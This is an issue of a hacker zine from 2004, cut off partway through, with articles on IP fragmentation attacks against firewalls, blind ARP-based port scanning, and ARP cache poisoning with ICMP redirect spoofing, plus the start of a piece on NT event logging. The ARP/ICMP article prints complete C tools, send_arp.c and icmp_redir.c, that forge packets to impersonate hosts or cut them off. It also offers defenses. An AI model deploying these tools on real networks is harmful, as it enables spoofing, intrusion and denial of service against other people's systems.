Copy Link
Add to Bookmark
Report
Keen Veracity Issue 13
--------------------------------------------------------------------------------
_ _ _ _ _
| | / ) | | | | (_)_
| | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _
| |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | |
| | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| |
|_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ |
(____/
--------------------------------------------------------------------------------
I S S U E (13) L e g i o n s o f t h e U n d e r g r o u n d
-------------------------------------------------[www.legions.org]--------------
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
[CONTENTS]------------------------------------------------------------[CONTENTS]
[1]===========================[Editorial - Archimedes <Archimedes@legions.org> ]
[2]==============[Best of KV Issue 3: Packet Fragmentation Attacks - Dr. Cohen ]
[3]=============[Blind Scanning using ARP - Case/Phriction <phric@legions.org> ]
[4]=[Best of KV Issue 7: Playing redir games with ARP and ICMP - yuri volobuev ]
[5]===========[Best of KV Issue 10: NT Logging - NtWak0 - <ntwak0@safehack.com>]
[6]==[Blackboard 5 Password Enumeration - Case/Phriction - <phric@legions.org> ]
[7]====================[ The InfoSec Art of war - VulnDev - <mark@vulndev.org> ]
[8]=============================[Connect back shell in R - <xonox@b0rken.com> ]
[9]=======================[Insight into: Non-repressive Governments - The Barn]
[10]=========================[Snorting Cisco - Digital Ebola <digi@legions.org>]
[11]====================[Artificial Infosex - Datacide <datacide@inet-sec.org> ]
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
W W W . L E G I O N S . O R G
[LoU]=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=[LoU]
--------------------------------------------------------------------------------
[Editorial]================================[Archimedes <archimedes@legions.org>]
--------------------------------------------------------------------------------
I'm sat here on a Sunday morning, about 12 months after KV13 was meant to be
released with only a few things weighing on my mind (as far as KV readers are concerned).
Please bear in mind that these are only my musings, not always in a coherent order.
Firstly: Oh god my head hurts
Secondly: Oh god my head hurts.
Thirdly: Caffeine
-- some time later --
Well it has been a VERY long time since the last KV release.
What, in my opinion, has changed? (Other than the editor).
Not much. This is what concerns me. There no longer seems to be such an
enthusiasm into exploit development and research from the general community.
Sadly by now most of us know where our "battle lines" are drawn.
Those who don't are going to need to make their minds up soon I fear.
It really isn't that long ago that the security "industry" became a major revenue earner.
What really does concern me is that there are people out there who are more concerned about who
is going to give them the most money for an exploit rather than the side-effects of putting it
into the "public" domain. I have spoken to people, mostly the "next generation", who are VERY
talented and DO have the enthusiasm. However they have debts and see a solution to these debts
as being to sell their goods to "Security" companies.
We know that Microsoft has had "issues" with anti-competitiveness.
We know that Symantec now moderates the bugtraq list.
We can assume that full-disclosure may not be for much longer.
We should ALL BE AWARE that soon, un-licensed InfoSec research may be outlawed.
Is it safe that there are companies receiving information and exploits from all
over the globe, has anyone looked at monopolies within InfoSec?
Imagine a company, Private Exploit Notification & Information Service
They purchase exploits from the "underground".
Now, with a bit of background knowledge we know that <insert embargoed country>
is a major player in exploit research and development.
A lot of which can be linked to government funding.
Does PEN&IS have any <embargoed country> "hackers" which it is sending cash to through Western Union?
Is it paying the government of a country it shouldn't be?
If PEN&IS was being funded by a <non-embargoed countries gov science department> would that be illegal?
<end of imagination>
How do we, as researchers know who we are giving our research to? Are we providing weapons of war?
When will the move towards "Netcentric" warfare mean that exploits, such as holes in BGP,
can be life threatening?
We already win wars by hitting critical infrastructure with HE, that is tactics 101
(read VulnDev's publication below). When will governments be hitting it with -1day's?
Would this explain the motions within the EU to ban exploit research and even including
sections that would make partaking in such style discussions potentially illegal?
Let's hope not.
I truly hope that if your eyes are not open, they will be soon.
Hence, it is my honour bound duty to present to you,
Keen Veracity 13
(albeit a partially retro version).
(Feel free to applaud, mock, heckle etc.).
my great thanks to those people who gave input (constructive and otherwise) on this issue.
yours,
Archimedes
July 25th 2004
--------------------------------------------------------------------------------
[Packet Fragmentation Attacks]=======================================[Dr. Cohen]
--------------------------------------------------------------------------------
/* From Keen Veracity #3 */
ADVISORY: TCP packet fragment attacks against firewalls and filters
System: TCP/IP networks
Introduction to Packet Fragmentation
Packet fragmentation is the part of the Internet Protocol (IP) suite of
networking protocols that assures that IP datagrams can flow through any
other sort of network. (For details, see Internet Request For Comments 791
(rfc791) and are available and searchable in electronic form from Info-Sec
heaven on the World-Wide-Web at http://all.net, through gopher service at
all.net, or by ftp service from rs.internic.net.) Fragmentation works by
allowing datagrams created as a single packet to be split into many smaller
packets for transmission and reassembled at the receiving host.
Packet fragmentation is necessary because underlying the IP protocol, other
physical and or logical protocols are used to transport packets through
networks. A good example of this phenomena is on the difference between
Ethernet packets (which are limited to 1024 bytes), ATM packets (which are
limited to 56 bytes), and IP packets which have variable sizes up to about
1/2 million bytes in length.
The only exception to this rule is in the case of an internet datagram
marked don't fragment . Any internet datagram marked in this way is
supposed to not be fragmented under any circumstances. If internet
datagrams marked don't fragment cannot be delivered to their destination
without being fragmented, they are supposed to be discarded instead. Of
course, this rule doesn't have to be obeyed by the IP software actually
processing packets, but it is supposed to be.
How Packet Reassembly Attacks Work
The packet fragmentation mechanism leads to attacks that bypass many
current Internet firewalls, but the reason these attacks work is not
because of the way fragmentation is done, but rather because of the way
datagrams are reassembled.
Datagrams are supposed to be fragmented into packets that leave the header
portion of the packet intact except for the modification of the fragmented
packet bit and the filling in of an offset field in the IP header that
indicates at which byte in the whole datagram the current packet is
supposed to start. In reassembly, the IP reassembler creates a temporary
packet with the fragmented part of the datagram in place and adds incoming
fragments by placing their data fields at the specified offsets within the
datagram being reassembled. Once the whole datagram is reassembled, it is
processed as if it came in as a single packet.
According to the IP specification, fragmented packets are to be reassembled
at the receiving host. This presumably means that they are not supposed to
be reassembled at intermediate sites such as firewalls or routers. This
decision was made presumably to prevent repeated reassembly and
refragmentation in intermediate networks. When routers and firewalls
followed the rules, they found a peculiar problem.
The way firewalls and routers block specific services (such as telnet )
while allowing other services (such as the world wide web http service) is
by looking into the IP packet to determine which Transfer Control Protocol
(TCP) port is being used. If the port corresponds to 80, the datagram is
destined for http service, while port 23 is used for telnet . In normal
datagrams, this works fine. But suppose we didn't follow the rules for
fragmentation and created improper fragmented packets? Here's what one
attacker did:
* Create an initial packet which claims to be the first fragment of a
multi-packet datagram. Specify TCP port 80 in the TCP header so it
looks like a datagram going to http service, which is allowed to pass
the firewall.
* The firewall passes the packet to the host under attack and passes
subsequent packet fragments in order to allow the destination host to
reassemble the packet.
* One of the subsequent packets has an offset of 0 which causes the
reassembler to overwrite the initial part of the IP packet. This is
the part of the IP packet that specifies the TCP port. The attacker
overwrites the IP port number which was originally 80 with a new port
number such as 23, and is now granted telnet access to the host under
attack despite the firewall that is supposed to block the service.
--------------------------------------------------------------------------------
[Blind Scanning using ARP]===========================[Case <phric@legions.org> ]
--------------------------------------------------------------------------------
With people becoming more and more aware of security threats everyday,
new measures need to be constantly taken to bypass these security measures. I
am not writting this paper as a black hat or white hat but as someone who
chooses to freely disseminate information to the public whether it be of the
benign or malignant nature is of no consequence.
##### Normal Scanning techniques #####
Port scanning has gradually progressed along the years starting out from
as simple as telneting to individual ports to program or scripts that make
connect calls and advancing to custom crafted packets to use adherent weaknesses
in protocols to glean information about hosts. NMAP being the most popular and
efficient tool takes advantage of scanning techniques such as SYN, SYN/ACK, FIN,
RST, NULL and so called XMAS scans. These scans have gained great popularity and
are used frequently in probably most all port scans today. The new technique of
scanning I will show you soon in blind port scanning including IPID scanning
which is a feature in NMAP and a new technique I recently discovered BARP or
Broadcast ARP scanning like a BURP you can't see it but sometimes you can feel
the effects.
Using normal TCP flag probing one can use a technique affectionately termed
decoy by NMAP. This technique is performed by sending packets with fake Source
host addresses along with your own packets to mask were the aparent scan is
coming from. Though this technique can work quite well the scan can still usually be
traced back to one of two or three computers unless you used 100 decoys in which case
the time it took to perform the scan would slow down significantly.
BARP Scanning uses the TCP FIN or TCP NULL or TCP XMAS scanning techniques
along with perhaps a TCP ACK scan to see if ports are filtered. The reason we
use FIN, NULL and XMAS is that when a port is probed with one of these types of
packets they port in question should return a RST if the port is closed or
nothing if it is open, the host should, mind you, act this way and we will
assume it does for this paper as we describe BARP scanning later.
##### Blind Port Scanning techniques #####
Blind port scanning techniques are based of the premise that you do not
actually have to send a packet from your host to the target host and have
it return the packet to your host. Instead in some way you manipulate a packet
to exploit features in protocols. In this paper I will cover IPID scanning and
finally BARP scanning.
##### IPID Scanning #####
IPID scanning or idle host scanning is a blind port scanning technique
taking advantage of a predictably incremented IP ID value in a packet. To do
this, a person finds an idle host, host idle and forges packets from host idle
to target host. Now if we perform a SYN scan on target host and the port is
closed it will send a RST packet back to host idle which will drop it and end
of story but if the port is open a subsequent SYN/ACK will be sent to host idle
and host idle will reply to target host with a RST to end the communication
involuntarilly incrementing its IP ID values. So after each forged packet we
send from host idle to target host we probe host idle's IP ID number to see
if it has incremented. Check out NMAP and papers written by Fyodor for more
information on this subject. http://www.insecure.org/nmap
##### BARP Scanning #####
BARP scanning is based of the concept that when a packet is sent from host
A to nonexistent host B, host B - 1 hop will send an arp broadcast in an effort
to locate the location of host B. Voila commence BARP scans. So we should now
understand the basic concept and be able to exploit this feature to perform
blind port scans or ping scans. First we find a host on our subnet that does not exist,
host none. Now we forge a FIN packet from host none, to our target host.
And we wait and listen for arp broadcasts. Now if we receive a broadcast looking
for the hardware address of host none we know that the taget host must have sent a packet
back. Since FIN packets only return RSTs when the ports are closed we have found a closed
port. Now if on the next packet sent no arp broadcast is
snooped we know that the port is most likely open. The magic of great blind
scans begin. The problem is the scan can be narrowed down to your subnet, the benefit is
that is can be one of 253 computers. Now you can perform anonymous port scans on any
host! The hardware address in the ethernet header of the packet before it hits the first
router might be your only concern if it is logged, so don't bequeth the task of taking
out .govs and .microsoft.coms grasshoper until understood you have this fact and care
you have taken of it.
I'm a chunky monkey from funkytown...
code at: http://www.legions.org/~phric/arpscan.c
Questions comments email phric@legions.org.
--------------------------------------------------------------------------------
[Playing redir games with ARP and ICMP]==========================[yuri volobuev]
--------------------------------------------------------------------------------
/* From Keen Veracity #7 */
[ -Intro- ]
There're bugs and there're features. All too often the distinction between
the two is in the eye of the beholder. I'd like to show how two legitimate
protocols, ARP and ICMP, while properly implemented, can be used to achieve
something which is, well, not desirable.
While passive attacks (sniffing) that take advantage of the root access to
LAN are extremely popular and every half-way decent root kit has some kind
of a net sniffer, active attacks are not nearly as widespread. Yet, active
participation in the life of your LAN may bring lots of fun and joy. You
knew that already, it's just that technical details had been somewhat
obscure. So, let there be more light.
Possibilities outlined here include spoofing and DoS. While other means of
spoofing, such as IP blind spoofing, are more general and powerful, in terms
of who can use them, they require quite a lot of (guess)work and may be hard
to implement. ARP spoofing, on contrary, is very easy and robust.
While ARP spoofing is only possible on a local network, it may be a serious
concern as a way to extend an already existing security breach. If somebody
can break into one machine on a subnet, ARP spoofing can be used to
compromise the rest of it.
[ -Background on ARP- ]
[well, originally i wrote few paragraphs outlining arp, but then i figured
that if you didn't know how it works already, you'll need to learn it from a
better source. I recommend "TCP/IP Illustrated" by W.Richard Stevens.]
[ -What can be done- ]
Let's consider a hypothetical network
IP 10.0.0.1 10.0.0.2 10.0.0.3 10.0.0.4
hostname cat rat dog bat
hw addr AA:AA BB:BB CC:CC DD:DD (for short)
all connected by Ethernet in some simple way (i.e. no switches, no smart
hubs). You're on cat, you have root and desire to break into dog. You know
that dog trusts rat, so if you can successfully spoof rat, something can be
gained.
First thing that comes to mind (I think everybody was thinking about this at
some point) is "why don't I set my IP to the IP of that other machine
and..." That won't work, at least it won't work reliably. If you tell
Ethernet driver on cat that it's IP is 10.0.0.2, it'll start answering ARP
requests to that IP. But so will rat. It's a pure race condition, and
there's no winner. However, you can easily be the loser, because this
particular situation happens quite often when some box is misconfigured to
use somebody's else's IP, so many implmentations immedeately notice that and
loudly complain. Many network traffic analyzers flag that, too. Seeing a
syslog message saying something nasty (mentioning cat's Ethernet address) on
the LAN admin's console is not quite what you want. And what you want you
won't necessarily get, that is getting anything remotely close to a working
connection.
This of course can be helped. The attached program, send_arp.c, can be a
useful tool. Just as its name says, it sends an ARP packet [ARP reply, to
be exact: since the protocol is stateless, reply will be happily accepted
even if no one ever asked for it. Request would do just as well, though,
because of the ARP caching logic] to the net, and you can make this packet
to be what you want. What you want is an ability to specify source and
target IP and hardware addresses.
First, you don't want your Ethernet driver to talk too much, and it's easy
to accomplish with ifconfig -arp. Of course, it'll need ARP info anyway, so
you'll have to feed it to the kernel manually with arp(8). The critical
part is convincing your neighbours. In the case being described here, you
want dog to believe that rat's hardware address is that of cat (AA:AA), so
you send ARP reply with source IP 10.0.0.2, source hw address AA:AA, target
IP address 10.0.0.3 and target hardware address CC:CC. Now, for all dog
knows, rat is at AA:AA. Cache entry would expire, of course, so it needs to
be updated (request needs to be resent). How often depends on the
particular system, but every 40 sec or so should be sufficient for most
cases. Send it more often if you want, it won't hurt.
A complication here could come from an ARP caching implementation feature.
Some systems (e.g. Linux) would try to update their cache entries by sending
a unicast ARP request to the cached address (like your wife calling you just
to make sure you're there). Such a request can screw things up, because it
could change victim's ARP entry that we just faked, so it must be prevented.
This can be accomplished by feeding the "wife" system with replies so that
it never has to ask for it. Prevention is the best cure, as always. This
time, a real packet from dog to rat should be sent, it's just that cat will
be sending it, not dog, but for rat there's no way to tell. Again, doing it
about every 40 sec is usually OK.
So the procedure is simple. Bring up an alias interface, e.g. eth0:1 (or
use your current one, whatever), with rat's IP and ARP on -- you need to set
up some cache entries first, and it won't work on non-arp interface. Set up
a host route entry for dog through the right interface. Set up a cache
entry for dog, turn off arp, and it's all set.
Now, inject the venom with send_arp (hitting both dog and rat) and for all
dog knows, you're on rat. Just remember to keep sending those ARP packets
to dog and rat.
This attack only works on the local network, of course (in general, it can
reach as far as ARP packets can get, usually not too far because ARP packets
are almost never routed). But an interesting extension here is taking this
outside by replacing dog's hardware address in the above plan with the
router's. If it works (I'm not sure it always will, router's ARP
implementation may be tougher to fool, and since I don't want to try it on
real routers, I don't know, but there's no simple reason why not) you can
easily impersonate any machine on the local network to the rest of the
world. So the target machine could really be anywhere, but the machine
you're impersonating must be on the same LAN.
[ -What else can be done- ]
Aside from spoofing, there's range of other things you can do with ARP. The
sky is really the limit here. DoS is the most obvious application.
Feeding victim wrong hardware address is a powerful way to make it mute.
You can prevent it from talking to any particular machine (and ARP cache
size usually allows for the whole network to fit in, so effectively you can
stop it from talking to everybody for some time). Obvious target would be
the router. Cache poisoning again should be two-way: both the victim system
and the system you don't want victim to talk to should be fed. The simplest
case would be feeding a non-existant address. It's not the most efficient,
though, as the system will quickly realize that it's talking to nobody and
send out an ARP request. Of course, your next drop of poison will nullify
this, but you have to do it quite often. A more efficient approach here is
feeding the victim with the hardware address of the wrong machine, which
itself is alive and well. Again, it depends on a particular situation, but
very often what happens is that victim keeps sending out packets of various
types that arrive to the wrong destination, and destination system will
promptly send ICMP Xxx Unreachable messages back, thus emulating a
connection in some perverted way. This pseudo-conection can easily postpone
cache expiry. On Linux, for example, pseudo-connection raises cache expiry
from usual 1 min to about 10 min. By that time, most or all TCP connections
are screw up. Could be quite annoying. This way, one ARP packet can screw
someone.
An interesting twist here is so-called "gratuitous ARP". It's when the
source and target IPs in the ARP request are the same, and it usually
appears in a form of an Ethernet broadcast. Some implementations recognize
it as a special case, that of a system sending out updated information about
itself to everybody, and cache that request. This way one packet could
screw up the entire network. It must be admitted, though, that gratuitous
ARP is not really defined as a part of ARP, so it's up to vendor to (not)
implement it, and it's becoming increasingly less popular.
ARP is a serious tool for professional practical jokes, too. Just imagine
somebody setting up a relay, or tunnel, in a form of own machine that
convinced two neighbours to send their packets intended for each other to
relay's Ethernet. If relay just forwards packets to their real
destinations, no one would even notice. However, some simple data stream
modifications could have quite a spectacular effect on one's mental health.
A simple, CPU-inexpensive "filter" could be swapping random two bytes at
irregular long intervals. If it hits the data portion, most of the
checksums won't change, i.e. data stream would seem to be intact, yet
strange and unexplicable things _will_ happen for no apparent reason.
[ -ICMP redirects- ]
An effect somewhat similar to ARP cache poisoning can be achieved in a
different way, again using a legitimate protocol feature, ICMP route
redirects. Such a redirect is normally sent by the default router to the
system to indicate that there's a shorter route to some particular
destination. Originally, both network and host route redirects were
proposed, but later net redirects were deprecated and now are usually
treated as host redirects. Properly constructed ICMP packet that passes all
sanity checks (it must come from the default router for the destination it's
redirecting, new router should be on a directly connected network, etc.) it
causes a host-route entry be added to the system routing table.
The concept is just as secure as ICMP itself, i.e. (security)NULL. Spoofing
routers IP address is simple, and attached icmp_redir.c does just that.
Host Requirements RFC states that system MUST follow ICMP redirects unless
it's a router. And indeed all the systems I've tried happily accept it
(except vanilla Linux 2.0.30, where it's broken, it works in 2.0.29 and
2.0.31pre9, according to Alan Cox).
ICMP redirects present a rather potent DoS. Unlike ARP cache entries, those
host routes won't expire with time. And of course no access to local
network is required, attack can be launched from anywhere. So if the target
system does accept ICMP redirects (and packets can actually reach it) that
system can be stopped from talking to any particular address on the net
(well, not all, but those that aren't on the same subnet with the target).
Nameservers would be an obvious target.
[ -What can be done about it- ]
ARP is low level protocol and as such is usually hidden from normal people.
LAN admins may be concerned with it at times, but if all goes well no one
pays attention. One can always inspect contents of ARP cache using arp(8),
especially if there's some misterious network problem, but again it's not
the first thing that comes to mind. Even W95 has arp command, and
remembering about it may be helpful in certain situations. However, if
you're the target of the attack originating from another network via gateway
arp spoofing, there's no way to tell. Similarly, host routing table could
be examined to spot ICMP-generated entries (in most versions of route(1)
they are marked with D letter in flags field). Just be aware.
The above ARP attack scheme work perfectly for plain old 10Base2 Ethernet.
However, if machines are interconnected in some more advanced way,
particularly using some smart hubs or switches, attack can be more visible
or even impossible (same goes for passive attacks). So there's yet another
reason to invest in a good piece of network equipment. A good deal of peace
of mind may just come with it.
In general, however, I personally find it rather sad that things like ICMP
redirects were made a default. First, it's often not necessary because many
networks have very simple structure and there's never a need for anything in
addition to usual routing table. Second, on more sophisticated networks
routing table can be just as well set manually, it's not really such a
dynamic thing, so why do it via ICMP? And finally, it's dangerous, so I
would like to disable it on my systems, even though it'll make them less
compliant with RFC1122. Alas, it may not be easy. On Linux or any other OS
with sources available, I can at least hack the kernel and #define it out.
On Irix 6.2 and possibly other versions one can set icmp_dropredirects=1
with systune (I'm genuinely surprised to see it there, I really am). Other
OSes can be configurable, too, I have no information.
With ARP, we basically face a situation when the problem of name resolution
is solved dynamically without a centralized server. It doesn't have to be
this way. When one wants to map hostname to an IP, nameserver is queried or
/etc/hosts is consulted, i.e. there's some static mapping established. I
don't see why a similar thing can't be done with ARP. Ethernet hardware
addresses don't change too often, and when they do change, it won't kill net
admin to change the corresponding map. Ethernet can be forced in no-arp
mode, you just need to make sure your ARP cache has all the entries made as
permanent. As a bonus, this will reduce network traffic somewhat. Standard
procedures can be used to distribute ARP map, e.g. rdist, rsync (I would say
NIS, but if you use NIS, ARP is probably not your top security concern
anyway). Old tradition of /etc/ethers can be brought back to life. But
getting a kick-ass Ethernet switch still looks better to me (paying for it
does not, though).
And old wisdom still shine bright though time: don't use hostname-only based
auth. Those who do shall have no mercy from net gods.
cheers,
yuri
P.S. On Firewalls
I anticipate that many of you, having read the section about ICMP, are
already flexing the fingers preparing to write a follow-up explaining that
all those ICMP packets can be filtered out on the firewall, thus it's not a
problem. Please don't. I'm well aware of the concept. An if you feel you
absolutely have to, don't cc the list needlessly.
I have to note that many people use "i have firewall, and I like it,
therefore everyone else should get one or get lost" logic to argue that
certain security problems are less serious because they can be effectively
eliminated by putting a firewall between the protected network and
Internet. While I fully agree that having firewall is very good for
security, I want to note that it's not always possible or effective.
Imagine an environment where all machines are directly connected to
Internet, you have to share subnet with people you don't know who have
vanilla SGI boxes screaming "hack me pleeeease, my vendor did such a great
job of making it eeeeeeasy" all over the place (and sure, these people know
Unix, they've seen it in Jurassic Park... and that would be about it), and
the router to your subnet is controlled by a separate organization. Welcome
to a standard academic environment, where people don't use firewalls. In
fact, in some of those environments one would be useful to protect the
outside world from the people on the inside. Still, people work there, and
use computers, too. And that's where per-host security solutions are
necessary, it's a jungle where every host is for itself. So please, next
time you think "firewall", remember, it's not for everyone.
CUT HERE
/* send_arp.c
This program sends out one ARP packet with source/target IP and Ethernet
hardware addresses suuplied by the user. It compiles and works on Linux
and will probably work on any Unix that has SOCK_PACKET.
The idea behind this program is a proof of a concept, nothing more. It
comes as is, no warranty. However, you're allowed to use it under one
condition: you must use your brain simultaneously. If this condition is
not met, you shall forget about this program and go RTFM immediately.
yuri volobuev'97
volobuev@t1.chem.umn.edu
*/
#include <stdio.h>
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <netdb.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>
#define ETH_HW_ADDR_LEN 6
#define IP_ADDR_LEN 4
#define ARP_FRAME_TYPE 0x0806
#define ETHER_HW_TYPE 1
#define IP_PROTO_TYPE 0x0800
#define OP_ARP_REQUEST 2
#define DEFAULT_DEVICE "eth0"
char usage[]={"send_arp: sends out custom ARP packet. yuri volobuev'97\n\
\tusage: send_arp src_ip_addr src_hw_addr targ_ip_addr tar_hw_addr\n\n"};
struct arp_packet {
u_char targ_hw_addr[ETH_HW_ADDR_LEN];
u_char src_hw_addr[ETH_HW_ADDR_LEN];
u_short frame_type;
u_short hw_type;
u_short prot_type;
u_char hw_addr_size;
u_char prot_addr_size;
u_short op;
u_char sndr_hw_addr[ETH_HW_ADDR_LEN];
u_char sndr_ip_addr[IP_ADDR_LEN]; u_char rcpt_hw_addr[ETH_HW_ADDR_LEN];
u_char rcpt_ip_addr[IP_ADDR_LEN];
u_char padding[18];
};
void die(char *);
void get_ip_addr(struct in_addr*,char*);
void get_hw_addr(char*,char*);
int main(int argc,char** argv){
struct in_addr src_in_addr,targ_in_addr;
struct arp_packet pkt;
struct sockaddr sa;
int sock;
if(argc != 5)die(usage);
sock=socket(AF_INET,SOCK_PACKET,htons(ETH_P_RARP));
if(sock<0){
perror("socket");
exit(1);
}
pkt.frame_type = htons(ARP_FRAME_TYPE);
pkt.hw_type = htons(ETHER_HW_TYPE);
pkt.prot_type = htons(IP_PROTO_TYPE);
pkt.hw_addr_size = ETH_HW_ADDR_LEN;
pkt.prot_addr_size = IP_ADDR_LEN;
pkt.op=htons(OP_ARP_REQUEST);
get_hw_addr(pkt.targ_hw_addr,argv[4]);
get_hw_addr(pkt.rcpt_hw_addr,argv[4]);
get_hw_addr(pkt.src_hw_addr,argv[2]);
get_hw_addr(pkt.sndr_hw_addr,argv[2]);
get_ip_addr(&src_in_addr,argv[1]);
get_ip_addr(&targ_in_addr,argv[3]);
memcpy(pkt.sndr_ip_addr,&src_in_addr,IP_ADDR_LEN);
memcpy(pkt.rcpt_ip_addr,&targ_in_addr,IP_ADDR_LEN);
bzero(pkt.padding,18);
strcpy(sa.sa_data,DEFAULT_DEVICE);
if(sendto(sock,&pkt,sizeof(pkt),0,&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}
void die(char* str){
fprintf(stderr,"%s\n",str);
exit(1);
}
void get_ip_addr(struct in_addr* in_addr,char* str){
struct hostent *hostp;
in_addr->s_addr=inet_addr(str);
if(in_addr->s_addr == -1){
if( (hostp = gethostbyname(str)))
bcopy(hostp->h_addr,in_addr,hostp->h_length);
else {
fprintf(stderr,"send_arp: unknown host %s\n",str);
exit(1);
}
}
}
void get_hw_addr(char* buf,char* str){
int i;
char c,val;
for(i=0;i<ETH_HW_ADDR_LEN;i++){
if( !(c = tolower(*str++))) die("Invalid hardware address");
if(isdigit(c)) val = c-'0';
else if(c >= 'a' && c <= 'f') val = c-'a'+10;
else die("Invalid hardware address");
*buf = val << 4;
if( !(c = tolower(*str++))) die("Invalid hardware address");
if(isdigit(c)) val = c-'0';
else if(c >= 'a' && c <= 'f') val = c-'a'+10;
else die("Invalid hardware address");
*buf++ |= val;
if(*str == ':')str++;
}
}
CUT HERE
/* icmp_redir.c
This program sends out an ICMP host redirect packet with gateway IP supplied
by user. It was written and tested under Linux 2.0.30 and could be rather
easily modified to work on most Unices.
The idea behind this program is a proof of a concept, nothing more. It
comes as is, no warranty. However, you're allowed to use it under one
condition: you must use your brain simultaneously. If this condition is
not met, you shall forget about this program and go RTFM immediately.
yuri volobuev'97
volobuev@t1.chem.umn.edu
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <netdb.h>
#include <syslog.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip.h>
#define IPVERSION 4
struct raw_pkt {
struct iphdr ip; /* This is Linux-style iphdr.
Use BSD-style struct ip if you want */
struct icmphdr icmp;
struct iphdr encl_iphdr;
char encl_ip_data[8];
};
struct raw_pkt* pkt;
void die(char *);
unsigned long int get_ip_addr(char*);
unsigned short checksum(unsigned short*,char);
int main(int argc,char** argv){
struct sockaddr_in sa;
int sock,packet_len;
char usage[]={"icmp_redir: send out custom ICMP host redirect packet. \
yuri volobuev'97\n\
usage: icmp_redir gw_host targ_host dst_host dummy_host\n"};
char on = 1;
if(argc != 5)die(usage);
if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0){
perror("socket");
exit(1);
}
sa.sin_addr.s_addr = get_ip_addr(argv[2]);
sa.sin_family = AF_INET;
packet_len = sizeof(struct raw_pkt);
pkt = calloc((size_t)1,(size_t)packet_len);
pkt->ip.version = IPVERSION;
pkt->ip.ihl = sizeof(struct iphdr) >> 2;
pkt->ip.tos = 0;
pkt->ip.tot_len = htons(packet_len);
pkt->ip.id = htons(getpid() & 0xFFFF);
pkt->ip.frag_off = 0;
pkt->ip.ttl = 0x40;
pkt->ip.protocol = IPPROTO_ICMP;
pkt->ip.check = 0;
pkt->ip.saddr = get_ip_addr(argv[1]);
pkt->ip.daddr = sa.sin_addr.s_addr;
pkt->ip.check = checksum((unsigned short*)pkt,sizeof(struct iphdr));
pkt->icmp.type = ICMP_REDIRECT;
pkt->icmp.code = ICMP_REDIR_HOST;
pkt->icmp.checksum = 0;
pkt->icmp.un.gateway = get_ip_addr(argv[4]);
memcpy(&(pkt->encl_iphdr),pkt,sizeof(struct iphdr));
pkt->encl_iphdr.protocol = IPPROTO_IP;
pkt->encl_iphdr.saddr = get_ip_addr(argv[2]);
pkt->encl_iphdr.daddr = get_ip_addr(argv[3]);
pkt->encl_iphdr.check = 0;
pkt->encl_iphdr.check = checksum((unsigned short*)&(pkt->encl_iphdr),
sizeof(struct iphdr));
pkt->icmp.checksum = checksum((unsigned short*)&(pkt->icmp),
sizeof(struct raw_pkt)-sizeof(struct iphdr));
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) {
perror("setsockopt: IP_HDRINCL");
exit(1);
}
if(sendto(sock,pkt,packet_len,0,(struct sockaddr*)&sa,sizeof(sa)) < 0){
perror("sendto");
exit(1);
}
exit(0);
}
void die(char* str){
fprintf(stderr,"%s\n",str);
exit(1);
}
unsigned long int get_ip_addr(char* str){
struct hostent *hostp;
unsigned long int addr;
if( (addr = inet_addr(str)) == -1){
if( (hostp = gethostbyname(str)))
return *(unsigned long int*)(hostp->h_addr);
else {
fprintf(stderr,"unknown host %s\n",str);
exit(1);
}
}
return addr;
}
unsigned short checksum(unsigned short* addr,char len){
register long sum = 0;
while(len > 1){
sum += *addr++;
len -= 2;
}
if(len > 0) sum += *addr;
while (sum>>16) sum = (sum & 0xffff) + (sum >> 16);
return ~sum;
}
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
[NT Logging]======================================[NtWak0 <ntwak0@safehack.com>]
--------------------------------------------------------------------------------
/* From Keen Veracity #10 */
+-----------------------------------------------------------------------------+
|Author : NtWaK0 |
|Crew : Legions Of the Underound |
|Subject: NT LOGGING |
|Date: Sep-3-2000 |
+-----------------------------------------------------------------------------+
INTRODUCTION
============
Many peoples asked me about NT and where are THESE logs,so here we go
something I can think of about NT monitoring that will help NT admins and
others peoples too :)
First Let US Start With a Breif Description Of NT Logs.
NT LOGS DESCRIPTION
===================
Thier is no magic in NT logs like the UNIX logging.To manager you NT logs
you have to use "Event Viewer".
What is "Event Viewer", WELL IF YOU CLICK THE HELP IN NT VIEWER you will get
a nice description.:
Event Viewer is the tool you can use to monitor events in your system. You
can use Event Viewer to view and manage System, Security, and Application
event logs. You can also archive event logs. The event-logging service
starts automatically when you run Windows NT.
You can stop event logging with the Services tool in Control Panel.
Let me comment on this last phrase from MS HELP "You can stop event logging
with the Services tool in Control Panel" WELL IT IS NOT TRUE, YOU CANNOT
STOP EVENT VIEWER WHILE YOU ARE RUNNING NT. WHAT YOU CAN DO IS DISABLE IT
THAT MEAN NEXT TIME YOU REBOOT THE EVENT VIEWER SERVICE WILL BE STOPED.
So to resume you cannot STOP EVENTLOG from the GUI you can only disabled it
and from the command line you will get this :
----------------------------------------------[NET STOP EVENTLOG DUMP]------
C:\>net stop EVENTLOG
The requested pause or stop is not valid for this service.
More help is available by typing NET HELPMSG 2191.
C:\>NET HELPMSG 2191
The requested pause or stop is not valid for this service.
EXPLANATION
This command is invalid for this service, or the service cannot accept the
command right now.
